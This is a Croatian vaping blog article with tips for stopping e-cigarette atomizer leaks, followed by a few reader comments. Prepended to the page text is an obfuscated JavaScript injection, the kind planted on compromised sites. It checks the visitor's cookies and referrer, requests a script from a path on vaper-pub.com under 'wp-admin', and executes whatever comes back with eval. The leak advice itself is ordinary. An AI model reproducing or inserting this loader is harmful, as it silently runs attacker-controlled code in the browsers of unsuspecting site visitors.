;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}

Kako spriječiti curenje atomizera – kratke upute za svakog vapera

Napunili ste e-cigaretu svojom omiljenom e-tekućinom, povukli par puffova i odjednom e-tekućina curi niz ruku i kaplje po odjeći. Naravno, svakom se vaperu ovo dogodi prije ili kasnije i uglavnom je to rezultat sitnih problema s atomizerom za-ecigarete ili grijačem koji se vrlo lako otklanjaju.

Pogledajmo kratke upute koje će vam pomoći da spriječite curenje atomizera.

Provjerite brtve (O-ringove)

O-ringovi su male silikonske gumice na atomizeru koje služe za brtvljenje svih različitih dijelova. Ako su vam poderani ili oštećeni, to omogućuje e-tekućini da dospije kamo ne bi trebala što će vjerojatno prouzročit curenje. Čak i ako nikada niste ispustili ili rastavljali atomizer, o-ringovi i dalje mogu oslabiti i otkazati tijekom vremena.

Rastavite spremnik i provjerite brtvu koja se nalazi ispod stakla. Ako postoji rascjep na o-ringu, morat ćete ga zamijeniti. Većina spremnika dolazi s rezervnim gumicama što znači da je najjednostavnije rješenje da uklonite stari oštećeni O-ringi postavite novi na isto mjesto. Ponovno sastavite spremnik i provjerite hoće li to riješiti problem.

Provjerite ima li pukotina na spremniku

Ako je neka od komponenti vašeg spremnika napuknuta, to bi definitivno mogao biti razlog za curenje tekućine. Pukotina u staklu spremnika može biti očita, ali svakako provjerite i druge dijelove atomizera. Pukotina u prstenu za kontrolu protoka zraka, dimnjaku ili drugom komadu mogla bi biti odgovorna za curenje.

Pažljivo pregledajte sve pojedinačne komponente vašeg atomizera za bilo kakva oštećenja ili nedostatke. Ako nađete oštećenje, najbolji će biti zamijeniti komad ukoliko imate rezervni. Ako niste prouzročili štetu, trebate podnijeti zahtjev za jamstvo proizvođaču. U suprotnom, možete pokušati kontaktirati proizvođača za kupnju određenih dijelova. U najgorem slučaju morat ćete kupiti novi atomizer.

Ne povlačite previše jako

Ako povučete previše jako pri udisanju, to može uzrokovati da vaša zavojnica povuče više tekućine nego što može podnijeti. To će preplaviti zavojnicu i uzrokovati curenje viška iz spremnika. Pokušajte par puta laganije udahnuti i provjerite hoće li to riješiti problem.

Parite na većoj snazi (W)

Ako ne parite dovoljno visokom snagom, vaši grijači možda upijaju tekućinu brže nego što ona može ispariti. Kada se to dogodi, vata mogu postati prezasićena i uzrokovati curenje spremnika.

Povećajte snagu vašeg vape moda za 5-10 vata i pogledajte hoće li to zaustaviti curenje. Većina zavojnica će također imati preporučenu snagu otisnutu na zavojnici. Pokušajte ostati unutar tog raspona kako biste bili sigurni da isparavate svoju e-tekućinu ispravno.

Nemojte prepuniti spremnik

Iako bi moglo biti primamljivo napuniti spremnik što je više moguće, nemojte. Prilikom punjenja ostavite malo prostora u spremniku kako bi se tekućina mogao kretati. Višak tekućine mora negdje otići i uglavnom će iscuriti kroz rupe za zrak ukoliko pretjerate.

Pokušajte e-cigaretu držati uspravno

Vaš spremnik je dizajniran za rad na vrlo specifičan način. Naginjanje ili odlaganje spremnika može uzrokovati odlazak tekućine tamo gdje ne bi trebalo. Naginjanje spremnika tijekom povlačenja ne bi trebalo imati štetnih učinaka, ali sve duže od nekoliko sekundi moglo bi uzrokovati probleme kod nekih e-cigareta. Ukoliko koristite modove za e-cigarete, uvijek ih odlažite uspravno.

Provjerite grijač

Zavojnice se masovno proizvode tako da uvijek postoji šansa da poneka neće raditi kako treba. Ako zavojnica nije pravilno sastavljena, to može biti uzrok curenja. Moglo bi doći do puknuća, iskrivljenosti ili drugog manje očitog problema sa zavojnicom. Ako ste isprobali sve ostalo i čini se da ništa ne radi onda bi to mogla biti zavojnica. Pokušajte zamijeniti zavojnicu novom i pogledajte hoće li to pomoći.

Ako ne koristite kupovne grijače, provjerite količinu vate koju ste provukli kroz zavojnicu. Generalno je pravilo da ukoliko vate ima premalo, atomizer će curiti. S druge strane, ako vate ima previše, neće se dovoljno natopiti te ćete prilikom povlačenja osjetiti zagorjeli ukus. Trebat će vam par pokušaja da naučite odrediti savršenu količinu vate, ali kada se jednom ispraksirate, ovo postaje veoma jednostavno.

Zatvorite protok zraka kada punite atomizer

Zgodan mali trik za sprječavanje curenja je zatvoriti protok zraka prilikom punjenja. Kod određenih spremnika, ejuice će pokušati pobjeći kada zatvorite gornji poklopac. Ako su vam otvori za protok zraka otvoreni, to je jedini mogući izlaz i tekućina će početi curiti.

Provjerite jesu li svi dijelovi atomizera pričvršćeni

Ovo se može činiti očitim, ali to je čest uzrok curenja. Provjerite je li vaš spremnik čvrsto i pravilno pričvršćen. Provjerite jesu li svi dijelovi koji se spajaju vijcima pravilno sastavljeni i da ništa nije olabavljeno. Ipak, pazite da ne zategnete previše. Kada počnete osjećati otpor, nemojte ga forsirati jer biste mogli razbiti stakleni spremnik ili uništiti navoj.

Koristite tekućinu s manje PG-a

VG i PG dvije su glavne komponente vaše e-tekućine. Na bočici tekućine ili baze obično će pisati omjer, npr.70VG/30PG ili 60VG/40PG. Budući da je PG znatno rjeđi od VG-a, može se desiti da to uzrokuje curenje, mada kod većine atomizera ovo ne bi smio biti problem. Ipak, ukoliko ništa drugo ne pomaže, pokušajte natočiti tekućinu s malo više VG-a nego obično i provjerite hoće li to riješiti problem.

Choose your Reaction!
  • Meni neki puta Digiflavor Siren 2 procuri, al’ to odmah znam o čemu se radi. Ako provučem premalo pamuka kroz coil, onda voli zasliniti kroz airflow rupice.
    Malo deblji komad pamuka riješava taj problem sa Siren 2 atomizerom.

    • Slažem se, i na Ares 2 isto je puuunoooo pomoglo ubacivanje više i gušče vate kroz zavojnicu ilitiga grijač…:)

  • Osim ako imate Pioneer Rta, za to je potreban poseban članak, dva…😆😉

Leave a Comment